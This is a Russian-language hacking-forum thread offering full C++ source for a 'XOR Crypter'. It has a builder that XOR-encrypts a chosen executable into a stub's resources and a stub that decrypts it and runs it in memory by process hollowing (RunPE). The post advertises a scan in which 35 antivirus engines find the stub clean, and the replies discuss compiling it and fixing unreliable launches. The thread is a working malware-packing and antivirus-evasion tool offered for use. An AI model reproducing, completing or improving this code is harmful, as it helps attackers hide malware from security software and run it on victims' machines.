• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

XOR Crypter (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

rain.hf

Житель форума
Форумчанин
Регистрация
08.12.2015
Сообщения
116
Репутация
90
билдер

Код:
#include <iostream>
#include <Windows.h>
#include <fstream>
#include <vector>
#include <string>
using namespace std;

char * FB;
DWORD fs;
char output[MAX_PATH];
char choice;
DWORD dwBytesWritten = 0;
char name[MAX_PATH];
std::vector<char> file_data;
void RDF()
{
    DWORD bt;
                            
    cout << "Please enter the Path of the file \nIf the file is in the same folder as the builder\nJust type the file name with an extention\nEG: Malvare.exe\n";
    cout << "File Name: ";
    cin >> name;
    cout << "Enter output name: ";
    cin >> output;
    CopyFile("stub.exe", output/*L"Crypted.exe"*/, 0);
    cout << "\nGetting the HANDLE of the file to be crypted\n";
    HANDLE efile = CreateFileA(name, GENERIC_ALL,FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    cout << "Getting the File size\n";
    fs = GetFileSize(efile, NULL);

    cout << "The File Size is: ";
    cout << fs;
    cout << " Bytes\n";
    cout << "Allocating Memory for the ReadFile function\n";
    file_data.resize(fs);
    cout << "Reading the file\n";


    ReadFile(efile, (LPVOID)(file_data.data()), fs, &bt, NULL);

    CloseHandle(efile);

    if (fs != bt)
        cout << "Error reading file!" << endl;
}

void xor_crypt(const std::string &key, std::vector<char> &data)
{
    for (size_t i = 0; i != data.size(); i++)
        data[i] ^= key[i % key.size()];

    /*ofstream out("After_enc.dat");
    for (std::vector<char>::const_iterator it = data.begin(), itEnd = data.end(); it != itEnd; ++it)
        out << *it;*/
}

void choose_enc()
{

    cout << "\n\nChoose encryption method: " << endl;
    cout << "1. N/A" << endl;
    cout << "2. Simple XOR" << endl;
    cin >> choice;
}

void enc()
{
    cout << "Encrypting the Data\n";

    switch (choice)
    {
    case '1':
        break;
    case '2':
        {
            /*ofstream myfile("2.dat");
            for (std::vector<char>::const_iterator it = file_data.begin(), itEnd = file_data.end(); it != itEnd; ++it)
                myfile << *it;*/
            xor_crypt("penguin", file_data); //Encrypt it

        }
        break;
        return;
    }
}

void WriteToResources(LPTSTR szTargetPE, int id, LPBYTE lpBytes, DWORD dwSize)
{
    cout << "Writing Encrypted data to stub's resources\n";
    HANDLE hResource = NULL;
    hResource = BeginUpdateResource(szTargetPE, FALSE);
    //LPVOID lpResLock = LockResource(lpBytes);
    UpdateResource(hResource, RT_RCDATA, MAKEINTRESOURCE(id), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),(LPVOID)lpBytes, dwSize);
    EndUpdateResource(hResource, FALSE);
}

int main()
{
    std::string key = "penguin";
    RDF();
    choose_enc();
    enc();
    file_data.push_back(choice);
    cout << fs << endl;
    WriteToResources(output, 10, (BYTE *)file_data.data(), file_data.size());
    cout << "Your File Got Crypted\n";
    system("PAUSE");
}
Стаб

runpe.h
Код:
#include <Windows.h>
#include <TlHelp32.h>
#include <wchar.h>
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
typedef BOOL(WINAPI * NtSetThreadContext)(HANDLE hThread, PCONTEXT lpContext);
typedef LPVOID(WINAPI * callVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef LPVOID(WINAPI * callVirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef bool(WINAPI * callReadProcessMemory)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
typedef bool(WINAPI * callWriteProcessMemory)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
typedef HANDLE(WINAPI * callCreateToolhelp32Snapshot)(DWORD dwFlags, DWORD th32ProcessID);
typedef HANDLE(WINAPI * callProcess32First)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
typedef HANDLE(WINAPI * callProcess32Next)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);




void ExecFile(LPSTR szFilePath, LPVOID pFile)
{
    PIMAGE_DOS_HEADER IDH;
    PIMAGE_NT_HEADERS INH;
    PIMAGE_SECTION_HEADER ISH;
    PROCESS_INFORMATION PI;
    STARTUPINFOA SI;
    PCONTEXT CTX;
    PDWORD dwImageBase;
    NtUnmapViewOfSection xNtUnmapViewOfSection;
    NtSetThreadContext xNtSetThreadContext;
    callReadProcessMemory xReadProcessMemory;
    callWriteProcessMemory xWriteProcessMemory;
    callVirtualAlloc xVirtualAlloc;
    callVirtualAllocEx xVirtualAllocEx;
    LPVOID pImageBase;
    int Count;
    IDH = PIMAGE_DOS_HEADER(pFile);
    if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
    {
        INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
        if (INH->Signature == IMAGE_NT_SIGNATURE)
        {
            RtlZeroMemory(&SI, sizeof(SI));
            RtlZeroMemory(&PI, sizeof(PI));

            if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
            {
                xVirtualAlloc = callVirtualAlloc(GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAlloc"));
                xVirtualAllocEx = callVirtualAllocEx(GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAllocEx"));
                xReadProcessMemory = callReadProcessMemory(GetProcAddress(GetModuleHandleA("kernel32.dll"), "ReadProcessMemory"));
                xWriteProcessMemory = callReadProcessMemory(GetProcAddress(GetModuleHandleA("kernel32.dll"), "WriteProcessMemory"));
                CTX = PCONTEXT(xVirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
                CTX->ContextFlags = CONTEXT_FULL;
                if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
                {
                    xReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);

                    if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
                    {
                        xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
                        xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
                    }

                    pImageBase = xVirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);



                    if (pImageBase)
                    {
                        xWriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
                        for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
                        {
                            ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
                            xWriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
                        }
                        xWriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
                        CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;

                        xNtSetThreadContext = NtSetThreadContext(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetContextThread"));
                        xNtSetThreadContext(PI.hThread, LPCONTEXT(CTX));

                        ResumeThread(PI.hThread);
                    }



                }
            }
        }
    }
    VirtualFree(pFile, 0, MEM_RELEASE);
}
main

Код:
#include <iostream>
#include <Windows.h>
#include <fstream>
#include "Runpe.h"
#include <vector>
#include <string>
using namespace std;


int Rsize;


std::vector<char> RData;

void Resource(int id)
{
    size_t Rsize;

    HRSRC hResource = FindResource(NULL, MAKEINTRESOURCE(id), RT_RCDATA);
    HGLOBAL temp = LoadResource(NULL, hResource);
    Rsize = SizeofResource(NULL, hResource);
    RData.resize(Rsize);
    memcpy((void*)RData.data(), temp, Rsize);  // replace &RData[0] with RData.data() if C++11
}

void xor_crypt(const std::string &key, std::vector<char> &data)
{
    for (size_t i = 0; i != data.size(); i++)
        data[i] ^= key[i % key.size()];
}



void enc()
{
    switch (RData.back())
    {
    case '1':
        {
            std::ofstream out("1.txt");
        }
        break;
    case '2':
        {
            xor_crypt("penguin", RData);
        }
        break;
    }
    return;
}



int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{

    Resource(10);
    enc();

    LPVOID pFile;
    TCHAR szFilePath[1024];

    pFile = RData.data();
    if (pFile)
    {
        GetModuleFileNameA(0, LPSTR(szFilePath), 1024);

        ExecFile(LPSTR(szFilePath), pFile);
    }
    return 0;
};

Filename: Stub.exe
Filesize: 309,50 kB
Date: 2016-04-27 08:07:58
MD5: 8a51b89c2da3f4acbac2ad0f68f17a02
SHA1: 3d3165543d782c405eb768e4e34d47608b88a05c
Status: Clean
Rate: 0/35

Details:
Ad-Aware - File is clean
A-Squared - File is clean
Avast - File is clean
AVG Free - File is clean
AntiVir (Avira) - File is clean
BitDefender - File is clean
BullGuard - File is clean
Clam Antivirus - File is clean
COMODO Internet Security - File is clean
Dr.Web - File is clean
ESET NOD32 - File is clean
eTrust-Vet - File is clean
FortiClient - File is clean
F-PROT Antivirus - File is clean
F-Secure Internet Security - File is clean
G Data - File is clean
IKARUS Security - File is clean
K7 Ultimate - File is clean
Kaspersky Antivirus - File is clean
McAfee - File is clean
MS Security Essentials - File is clean
NANO Antivirus - File is clean
Norman - File is clean
Norton Antivirus - File is clean
Panda CommandLine - File is clean
Panda Security - File is clean
Quick Heal Antivirus - File is clean
Solo Antivirus - File is clean
Sophos - File is clean
SUPERAntiSpyware - File is clean
Trend Micro Internet Security - File is clean
Twister Antivirus - File is clean
VBA32 Antivirus - File is clean
VIPRE - File is clean
Zoner AntiVirus - File is clean

Scan Result: https://scan.majyx.net/scans/result/a138fa1dbfe5b6431e2f17d61b38cdd17b429ee8
Scan by MaJyx Scanner
 
Последнее редактирование:

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
429
Репутация
130
Никогда не имел дела с VS как там компилировать/какой тип проекта выбирать?
 

Platon666

Житель форума
Форумчанин
Регистрация
14.08.2014
Сообщения
61
Репутация
29
Jabber
Ради интереса собрал, но криптованый файл через раз запускался.
 

stalker4026

Житель форума
Форумчанин
Регистрация
31.08.2017
Сообщения
2
ResumeThread нужно делать после всех операций с потоком, иначе будет вероятность что файл запустится приостановленным.